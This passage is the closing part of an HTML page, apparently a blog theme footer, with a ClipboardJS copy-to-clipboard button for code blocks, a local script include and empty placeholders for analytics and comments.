    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
